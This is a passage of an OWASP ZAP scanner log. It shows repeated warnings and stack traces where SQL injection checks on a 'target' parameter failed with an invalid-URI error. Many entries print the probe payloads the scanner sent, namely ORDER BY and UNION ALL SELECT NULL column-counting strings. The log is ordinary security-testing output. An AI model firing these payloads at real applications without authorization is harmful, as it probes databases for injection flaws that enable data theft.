org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685516 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685517 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685518 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') ORDER BY 1022-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685524 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685525 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685527 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685529 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685530 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685531 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685532 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685533 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685534 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685535 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685537 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685538 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' ORDER BY 1441-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685539 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at 